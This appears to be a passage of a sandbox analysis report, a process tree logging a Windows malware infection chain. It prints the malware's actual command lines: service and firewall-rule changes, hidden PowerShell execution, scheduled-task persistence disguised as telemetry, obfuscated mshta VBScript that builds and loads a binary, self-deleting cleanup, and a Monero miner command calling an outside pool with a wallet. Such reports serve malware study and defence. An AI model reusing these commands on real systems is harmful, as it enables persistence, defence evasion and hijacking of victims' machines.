                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" config eiclvsgs binPath= "C:\Windows\SysWOW64\eiclvsgs\ylursxjw.exe /d\"C:\Users\Admin\skcjizkr.exe\""
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:2112
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start eiclvsgs
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:7108
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6430.bat" "
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:9016
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:8164
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5766.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5766.exe
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    PID:8664
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\mannishly.bat" "
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:7492
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\bifurcation.exe
                                                                                                                                                                                                                                                          bifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          PID:1236
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\beadroll.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\beadroll.exe"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:1108
                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:6464
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5E9B.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5E9B.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                          PID:9084
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\73CA.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\73CA.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:7652
                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:988
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7DED.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7DED.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              PID:3512
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8EE5.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8EE5.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:1868
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8EE5.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8EE5.exe
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4512
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ACEE.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\ACEE.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:5552
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B8A7.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B8A7.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:1368
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FDBB.exe
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:7152
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:7132
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:8356
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\sc.exe" qc windefend
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                PID:6140
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:8120
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\whoami.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\whoami.exe" /groups
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:4904
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:3180
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\net1.exe" start lsass
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:2960
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:3568
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:8632
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\sc.exe" qc windefend
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:6496
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:6964
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\whoami.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4252
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:2040
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\net1.exe" start lsass
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:4516
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\fontdrvhost.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:3580
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                  PID:5660
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:352
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\gxQ39MPe741HC8hh.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\gxQ39MPe741HC8hh.exe"
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                      PID:836
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                          PID:2148
                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 49YaCLR6euq4TAt1Nj42ZeHFmJGdFGJspjjfpWNUaw7jb6L14vAvMZSh27tmKVBivE657AgHGP8XcKVv92D7vtVfQG2ckXx.RIG1 -p x --algo rx/0
                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                            PID:8068
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\cbISm1DrKEPZdlHZ.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\cbISm1DrKEPZdlHZ.exe"
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:680
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                              PID:3928
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                  PID:4012
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe
                                                                                                                                                                                                                                                                                                              -a "C:\Users\Admin\AppData\Local\a4755c5f\plg\uyLKeN5w.json"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                              PID:6972
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe
                                                                                                                                                                                                                                                                                                                -a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                • Accesses Microsoft Outlook accounts
                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                PID:7652
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FDCC.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\FDCC.exe
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FDCC.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\FDCC.exe
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:7908
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                              PID:7536
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BB.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\BB.exe
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5460
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2CF.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2CF.exe
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                            PID:1948
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 2CF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2CF.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:8856
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                  taskkill /im 2CF.exe /f
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                  PID:8204
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                  PID:5148
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2C03.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2C03.exe
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3240
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                                                                                                • outlook_office_path
                                                                                                                                                                                                                                                                                                                • outlook_win_path
                                                                                                                                                                                                                                                                                                                PID:6456
                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5472
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:3588
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:7484
                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                      PID:8408
                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Cjpfti\Cookiesgf8.exe
                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Cjpfti\Cookiesgf8.exe"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:5348
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9E17.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9E17.exe
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:5008
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\indelicately.bat" "
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:2768
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\emulsified.exe
                                                                                                                                                                                                                                                                                                                                emulsified.exe -p"nagbwnibhfqjvjfqgylqpaxfywzhea"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:7844
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\attributing.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX5\attributing.exe"
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:8
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BA6A.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\BA6A.exe
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                PID:8560
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im BA6A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\BA6A.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:4524
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                      taskkill /im BA6A.exe /f
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                      PID:2032
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DE7D.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DE7D.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                  PID:5480
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScrIPT: cloSe (cReAteoBjECt ( "WSCrIPt.sHeLl" ). rUn ("C:\Windows\system32\cmd.exe /C COPy /y ""C:\Users\Admin\AppData\Local\Temp\DE7D.exe"" ..\0~X~rMyFa.ExE && sTARt ..\0~x~RMyFA.eXe -P7tO7fJrLDOQDzTVAD & If """" == """" for %a iN ( ""C:\Users\Admin\AppData\Local\Temp\DE7D.exe"" ) do taskkill /Im ""%~nxa"" /F " , 0 , tRue ))
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                    PID:8848
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C COPy /y "C:\Users\Admin\AppData\Local\Temp\DE7D.exe" ..\0~X~rMyFa.ExE &&sTARt ..\0~x~RMyFA.eXe -P7tO7fJrLDOQDzTVAD & If "" == "" for %a iN ( "C:\Users\Admin\AppData\Local\Temp\DE7D.exe" ) do taskkill /Im "%~nxa" /F
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:6952
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0~X~rMyFa.ExE
                                                                                                                                                                                                                                                                                                                                          ..\0~x~RMyFA.eXe -P7tO7fJrLDOQDzTVAD
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                          PID:8264
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbScrIPT: cloSe (cReAteoBjECt ( "WSCrIPt.sHeLl" ). rUn ("C:\Windows\system32\cmd.exe /C COPy /y ""C:\Users\Admin\AppData\Local\Temp\0~X~rMyFa.ExE"" ..\0~X~rMyFa.ExE && sTARt ..\0~x~RMyFA.eXe -P7tO7fJrLDOQDzTVAD & If ""-P7tO7fJrLDOQDzTVAD "" == """" for %a iN ( ""C:\Users\Admin\AppData\Local\Temp\0~X~rMyFa.ExE"" ) do taskkill /Im ""%~nxa"" /F " , 0 , tRue ))
                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                            PID:3384
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C COPy /y "C:\Users\Admin\AppData\Local\Temp\0~X~rMyFa.ExE" ..\0~X~rMyFa.ExE &&sTARt ..\0~x~RMyFA.eXe -P7tO7fJrLDOQDzTVAD & If "-P7tO7fJrLDOQDzTVAD " == "" for %a iN ( "C:\Users\Admin\AppData\Local\Temp\0~X~rMyFa.ExE" ) do taskkill /Im "%~nxa" /F
                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                PID:2548
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbscRIPt: ClOse ( CREatEOBJect ( "WSCRIpt.sHELL" ). ruN ( "C:\Windows\system32\cmd.exe /C ECho | Set /p = ""MZ"" > q4MYYY.W0j &copY /y /B Q4mYYY.w0J + pQp~o5Jf.7 + VLqQU.4JW + 1CRIb.A_ + OQZI.PQT + 2JHRu.YS ..\ykAJ9.n8J &STarT regsvr32 ..\yKAJ9.n8J -S & DEl /Q * " , 0, tRUE ))
                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                              PID:212
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C ECho | Set /p = "MZ" > q4MYYY.W0j &copY /y /B Q4mYYY.w0J + pQp~o5Jf.7 + VLqQU.4JW + 1CRIb.A_ + OQZI.PQT + 2JHRu.YS ..\ykAJ9.n8J &STarT regsvr32 ..\yKAJ9.n8J -S &DEl /Q *
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7104
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5604
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>q4MYYY.W0j"
                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4948
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                        regsvr32 ..\yKAJ9.n8J -S
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                          PID:5532
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                    taskkill /Im "DE7D.exe" /F
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                    PID:7904
                                                                                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:2852
                                                                                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:2708
                                                                                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
